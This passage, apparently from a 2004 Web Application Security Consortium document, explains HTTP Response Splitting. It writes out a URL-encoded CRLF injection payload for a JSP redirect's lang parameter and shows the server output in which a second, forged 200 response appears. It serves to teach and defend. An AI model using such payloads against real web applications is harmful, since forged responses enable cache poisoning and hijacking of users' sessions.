As can be seen, the lang parameter is embedded in the Location

response header.

Now, we move on to mounting an HTTP Response Splitting attack.

Instead of sending the value English, we send a value, which makes

use of URL encoded CRLF sequences to terminate the current

response, and shape an additional one. Here is how this is done:

/redir_lang.jsp?lang=foobar%0d%0aContent 

Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent 

Type:%20text/html%0d%0aContent 

Length:%2019%0d%0a%0d%0aShazam

This results in the following output stream, sent by the web server

over the TCP connection:

HTTP/1.1 302 Moved Temporarily

Date: Wed, 24 Dec 2003 15:26:41 GMT

Location: http://10.1.1.1/by_lang.jsp?lang=foobar

Content Length: 0

HTTP/1.1 200 OK

Content Type: text/html

Content Length: 19

Shazam

Server: WebLogic XMLX Module 8.1 SP1 Fri Jun 20 23:06:40 PDT 2003

271009 with

Content Type: text/html

Set Cookie:

JSESSIONID=1pwxbgHwzeaIIFyaksxqsq92Z0VULcQUcAanfK7In7IyrCS

T9UsS! 1251019693; path=/

[...]

Explanation: this TCP stream will be parsed by the target as follows:

A first HTTP response, which is a 302 (redirection) response. This

response is colored blue.

A second HTTP response, which is a 200 response, with a content

comprising of 19 bytes of HTML. This response is colored red.

67

Copyright 2004, Web Application Security Consortium. All rights reserved.